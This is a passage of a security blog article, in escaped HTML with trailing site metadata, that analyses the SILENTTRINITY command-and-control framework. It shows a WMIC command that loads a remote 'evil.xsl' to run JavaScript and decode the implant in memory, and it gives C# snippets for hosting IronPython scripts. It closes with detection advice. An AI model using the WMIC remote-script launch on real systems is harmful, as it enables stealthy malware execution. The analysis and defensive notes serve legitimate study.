\u002Fformat:\"evil.xsl\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\System32\\wbem\\WMIC.exe os get \u002Fformat:\"https:\u002F\u002Fexample.com\u002Fevil.xsl\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Process:\u003C\u002Fp>\u003Cp>wmic.exe -&gt; .xsl -&gt; javascript\u003C\u002Fp>\u003Cp>Load wmic.xsl via wmic.exe; wmic.xsl can be stored locally or on a remote server\u003C\u002Fp>\u003Cp>Similarly, the encrypted string is base64 decoded to decrypt SILENTTRINITY, ultimately loading it in memory (implemented via JavaScript)\u003C\u002Fp>\u003Cp>I have previously analyzed this exploitation method in an article:\u003C\u002Fp>\u003Cp>Analysis and Utilization of Invoking XSL Files via WMIC\u003C\u002Fp>\u003Ch4>4. Other Available Methods for Exploitation\u003C\u002Fh4>\u003Cp>SILENTTRINITY not included, here as an extension, for example:\u003C\u002Fp>\u003Cul>\u003Cli>regsvr32.exe, \"Code Execution of Regsvr32.exe\"\u003C\u002Fli>\u003Cli>rundll32.exe, \"Analysis on Utilizing Rundll32 for Program Execution\"\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Method of Using C# to Invoke Python via IronPython\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Requires IronPython, reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fironpython.net\u002F\u003C\u002Fp>\u003Cp>This section introduces some basic usage to help further extend the functionality of SILENTTRINITY\u003C\u002Fp>\u003Ch3>1. Commonly Used Basic Scripts\u003C\u002Fh3>\u003Cp>Download and install IronPython:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FIronLanguages\u002Fironpython2\u002Ftree\u002Fmaster\u002FSrc\u002FIronPythonCompiler\u003C\u002Fp>\u003Cp>Development tool: VS2015\u003C\u002Fp>\u003Cp>Create a new C# project, add references:\u003C\u002Fp>\u003Cul>\u003Cli>IronPython\u003C\u002Fli>\u003Cli>Microsoft.Scripting\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The generated exe after compilation requires the following dependency files:\u003C\u002Fp>\u003Cul>\u003Cli>IronPython.dll\u003C\u002Fli>\u003Cli>IronPython.Modules.dll (some projects do not require this)\u003C\u002Fli>\u003Cli>Microsoft.Dynamic.dll\u003C\u002Fli>\u003Cli>Microsoft.Scripting.dll\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>1. A simple hello world program, calling test.py, outputs Hello World\u003C\u002Fh4>\u003Cp>code1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>            engine.ExecuteFile(\"test.py\");\u003Cbr>\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>test.py:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>print(\"Hello World\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Pass parameters to the Python script and output\u003C\u002Fh4>\u003Cp>code2:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>\u003Cbr>            var scope = engine.CreateScope();\u003Cbr>\u003Cbr>            scope.SetVariable(\"argv\", \"Hello World\");\u003Cbr>\u003Cbr>            engine.ExecuteFile(\"test.py\",scope);\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>test.py:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>print('%s'%argv)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Call the main function of the Python script\u003C\u002Fh4>\u003Cp>code3:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>            var scope = engine.CreateScope();\u003Cbr>            engine.ExecuteFile(\"test.py\",scope);\u003Cbr>\u003Cbr>            dynamic main = scope.GetVariable(\"main\");\u003Cbr>\u003Cbr>            main();\u003Cbr>\u003Cbr>\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>test.py:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>def main():\u003Cbr>        print(\"Hello World\")\u003Cbr>if __name__ == '__main__':\u003Cbr>\tmain(\"\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Store the content of the Python script in a variable and execute it\u003C\u002Fh4>\u003Cp>code4:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            string script = \"print('%s'%argv)\";\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>            var scope = engine.CreateScope();\u003Cbr>            scope.SetVariable(\"argv\", \"Hello World\");\u003Cbr>            var sourceCode = engine.CreateScriptSourceFromString(script);\u003Cbr>            sourceCode.Execute(scope);\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Python scripts support third-party libraries\u003C\u002Fh4>\u003Cp>code5:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Collections.Generic;\u003Cbr>using System.Linq;\u003Cbr>using System.Text;\u003Cbr>using IronPython.Hosting;\u003Cbr>\u003Cbr>namespace IronPythonTest\u003Cbr>{\u003Cbr>    class Program\u003Cbr>    {\u003Cbr>        static void Main(string[] args)\u003Cbr>        {\u003Cbr>            var engine = Python.CreateEngine();\u003Cbr>            engine.SetSearchPaths(new[] { \"Lib\" });\u003Cbr>            engine.ExecuteFile(\"test.py\");\u003Cbr>        }\u003Cbr>    }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Find the installation path of IronPython, default is C:\\Program Files\\IronPython 2.7\u003C\u002Fp>\u003Cp>Copy the Lib directory from there to the same directory as the compiled IronPythonTest.exe\u003C\u002Fp>\u003Cp>test.py:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import os\u003Cbr>os.system(\"calc.exe\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Use ipyc to compile Python scripts into exe\u003C\u002Fh3>\u003Cp>Similar to py2exe functionality\u003C\u002Fp>\u003Cp>Source code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FIronLanguages\u002Fironpython2\u002Ftree\u002Fmaster\u002FSrc\u002FIronPythonCompiler\u003C\u002Fp>\u003Cp>Compiled files can be obtained from the IronPython directory\u003C\u002Fp>\u003Cp>Default installation location:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Program Files\\IronPython 2.7\\ipyc.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>SILENTTRINITY's launcher itself does not contain malicious functions; it merely downloads files from a remote server and utilizes IronPython to invoke Python, which is a completely normal feature\u003C\u002Fp>\u003Cp>The launch method leverages programs inherent to the Windows system (e.g., msbuild.exe, powershell.exe, wmic.exe, and can also be extended to regsvr32.exe or rundll32.exe), making it relatively stealthy\u003C\u002Fp>\u003Cp>However, SILENTTRINITY needs to initiate network connections to transmit stage.zip and Python scripts. Therefore, if a program invokes IronPython and initiates network connections, it is highly likely to be risky behavior\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes the implementation details of SILENTTRINITY, proposes some extension ideas, introduces the method of using IronPython in C# to call Python, and provides defense and detection recommendations based on the characteristics of SILENTTRINITY.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",720,"Onedaysec",5,"published","2026-02-02T07:38:21.197Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"SILENTTRINITY C2 Tool Analysis: IronPython Payloads & Defense","SILENTTRINITY, C2 tool, IronPython, payload execution, memory loading, cybersecurity analysis, defense detection, C# Python integration",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,47,4],875,874,873,872,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.088Z","2026-07-23T16:02:13.075Z","draft","2026-07-23T16:15:14.949Z"]